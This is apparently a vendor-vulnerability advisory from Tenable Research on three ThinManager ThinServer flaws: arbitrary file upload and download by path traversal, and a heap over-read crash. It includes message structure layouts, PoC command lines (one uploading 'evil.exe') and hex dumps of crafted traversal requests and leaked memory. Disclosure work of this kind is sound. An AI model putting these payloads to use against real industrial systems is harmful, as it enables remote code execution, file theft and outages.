Rockwell Automation ThinManager ThinServer Multiple Vulnerabilities

There are multiple vulnerabilities in Rockwell Automation ThinManager ThinServer.exe.

Affected Versions:

• 6.x - 10.x
• 11.0.0 - 11.0.5
• 11.1.0 - 11.1.5
• 11.2.0 - 11.2.6
• 12.0.0 - 12.0.4
• 12.1.0 - 12.1.5
• 13.0.0 - 13.0.1

CVE-2023-27855 - ThinManager ThinServer Path Traversal Upload

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

A client message sent to a synchronization thread in ThinServer.exe has the following structure:

// be = big endian
struct header
{
   be16 type;  // msg type
   be16 flags; // msg flags
               // 0x0001 - request
               // 0x0002 - response
               // 0x8000 - ?
   be32 len;   // msg body length
};
struct msg
{
   header hdr; 
   byte data[hdr.len]; // format depends on hdr.type
};

struct msg_7_35 
{
   header hdr;       // hdr.type must be 7 or 35
   be32 unk;
   string file_name; // null-terminated string
   string file_type;
   string unk;
   string unk;       // present only in msg 35
   be32 flen         // number of bytes in the fdata field
   byte fdata[flen]  // data to write to file_name 
};

A path traversal exists (via the file_name field) when processing a message of type 7 or 35 (SYNC_MSG_SEND_FILE). An unauthenticated remote attacker can exploit this to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious contents, potentially causing remote code execution.

POC:

A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.

Example output:

# echo -n 'malicious file contents' > /tmp/malicious_file_contents
# python3 thinserver_path_traversal_file_upload.py -t  -f /tmp/malicious_file_contents -n '\Program Files\Rockwell Software\ThinManager\evil.exe'
[-- req --]
00000000: 00 01 00 00                                       ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08  00 00 28 93 54 6B BB 3F  ..........(.Tk.?
Uploading local file /tmp/malicious_file_contents as \Program Files\Rockwell Software\ThinManager\evil.exe on the remote host.
Please check if the file has been uploaded.

CVE-2023-27856 - ThinManager ThinServer Path Traversal Download

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Message 8 sent by the client has the following the structure:

struct msg_8 
{
   header hdr;       // hdr.type must be 8
   be32 unk;
   string file_name; // null-terminated string
};

A path traversal exists (via the file_name field) when processing a message of type 8. An unauthenticated remote attacker can exploit this to download arbitrary files on the disk drive where ThinServer.exe is installed.

POC:

A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.

Example output:

# python3 thinserver_path_traversal_file_download.py -t  -f '\Windows\win.ini'
[-- req --]
00000000: 00 01 00 00                                       ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08  00 00 50 68 2F A1 BF 3F  ..........Ph/..?
[-- req --]
00000000: 00 08 00 01 00 00 00 30  00 00 00 AA 2E 2E 5C 2E  .......0......\.
00000010: 2E 5C 2E 2E 5C 2E 2E 5C  2E 2E 5C 2E 2E 5C 2E 2E  .\..\..\..\..\..
00000020: 5C 2E 2E 5C 2E 2E 5C 5C  57 69 6E 64 6F 77 73 5C  \..\..\\Windows\
00000030: 77 69 6E 2E 69 6E 69 00                           win.ini.
[-- res (up to 4096 bytes) --]
00000000: 00 08 00 02 00 00 00 64  00 00 00 AA 00 00 00 5C  .......d.......\
00000010: 3B 20 66 6F 72 20 31 36  2D 62 69 74 20 61 70 70  ; for 16-bit app
00000020: 20 73 75 70 70 6F 72 74  0D 0A 5B 66 6F 6E 74 73   support..[fonts
00000030: 5D 0D 0A 5B 65 78 74 65  6E 73 69 6F 6E 73 5D 0D  ]..[extensions].
00000040: 0A 5B 6D 63 69 20 65 78  74 65 6E 73 69 6F 6E 73  .[mci extensions
00000050: 5D 0D 0A 5B 66 69 6C 65  73 5D 0D 0A 5B 4D 61 69  ]..[files]..[Mai
00000060: 6C 5D 0D 0A 4D 41 50 49  3D 31 0D 0A              l]..MAPI=1..

CVE-2023-27857 - ThinManager ThinServer Heap-Based Buffer Overflow

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

A heap-based buffer over-read condition occurs when the msg_7_35.flen field indicates more data than present in the msg_7_35.fdata field. An unauthenticated remote attacker can exploit this vulnerability to:

• Create a large number of tmp files in C:\ProgramData\Rockwell Software\ThinManager\tmp\
• Cause memory contents after the fdata field to be written to the tmp files, which can be downloaded by exploiting vulnerability 2)
• Crash ThinServer.exe due to read access violation.

POC:

A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.

Example output:

# python3 thinserver_sendfile_dos.py -t 
Connection 1
Connection 2
Connection 3
Connection 4
Traceback (most recent call last):
  File "/work/0day/thinserver_sendfile_dos.py", line 33, in 
    s.connect((target, port))
ConnectionRefusedError: [Errno 111] Connection refused

After restarting ThinServer.exe

# python3 thinserver_path_traversal_file_download.py -t  -f '\ProgramData\Rockwell Software\ThinManager\tmp\tmpinstallfile_0'
[-- req --]
00000000: 00 01 00 00                                       ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08  00 00 00 BE 84 F6 62 3F  ..............b?
[-- req --]
00000000: 00 08 00 01 00 00 00 5F  00 00 00 AA 2E 2E 5C 2E  ......._......\.
00000010: 2E 5C 2E 2E 5C 2E 2E 5C  2E 2E 5C 2E 2E 5C 2E 2E  .\..\..\..\..\..
00000020: 5C 2E 2E 5C 2E 2E 5C 5C  50 72 6F 67 72 61 6D 44  \..\..\\ProgramD
00000030: 61 74 61 5C 52 6F 63 6B  77 65 6C 6C 20 53 6F 66  ata\Rockwell Sof
00000040: 74 77 61 72 65 5C 54 68  69 6E 4D 61 6E 61 67 65  tware\ThinManage
00000050: 72 5C 74 6D 70 5C 74 6D  70 69 6E 73 74 61 6C 6C  r\tmp\tmpinstall
00000060: 66 69 6C 65 5F 30 00                              file_0.
[-- res (up to 4096 bytes) --]
00000000: 00 08 00 02 00 05 D0 08  00 00 00 AA 00 05 D0 00  ................
00000010: 41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000020: 00 00 00 78 35 9C A0 F9  7F 00 00 D0 F1 92 A0 F9  ...x5...........
00000030: 7F 00 00 10 8F A2 02 00  00 00 00 01 00 00 00 00  ................
00000040: 00 00 00 01 00 00 00 00  00 00 00 10 00 00 00 00  ................
00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000060: 00 00 00 10 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000070: 00 00 00 FC C3 08 0F 00  1E 00 80 5C 00 3F 00 3F  ...........\.?.?
00000080: 00 5C 00 43 00 3A 00 5C  00 50 00 72 00 6F 00 67  .\.C.:.\.P.r.o.g
00000090: 00 72 00 61 00 6D 00 44  00 61 00 74 00 61 00 5C  .r.a.m.D.a.t.a.\
000000A0: 00 52 00 6F 00 63 00 6B  00 77 00 65 00 6C 00 6C  .R.o.c.k.w.e.l.l
000000B0: 00 20 00 53 00 6F 00 66  00 74 00 77 00 61 00 72  . .S.o.f.t.w.a.r
000000C0: 00 65 00 5C 00 54 00 68  00 69 00 6E 00 4D 00 61  .e.\.T.h.i.n.M.a
000000D0: 00 6E 00 61 00 67 00 65  00 72 00 5C 00 54 00 4D  .n.a.g.e.r.\.T.M
000000E0: 00 48 00 69 00 73 00 74  00 6F 00 72 00 79 00 2E  .H.i.s.t.o.r.y..
000000F0: 00 64 00 62 00 2D 00 6A  00 6F 00 75 00 72 00 6E  .d.b.-.j.o.u.r.n
00000100: 00 61 00 6C 00 00 00 00  00 00 00 00 00 00 00 00  .a.l............
00000110: 00 00 00 86 C3 02 0F F9  1F 00 90 00 00 00 00 00  ................
<...snip...>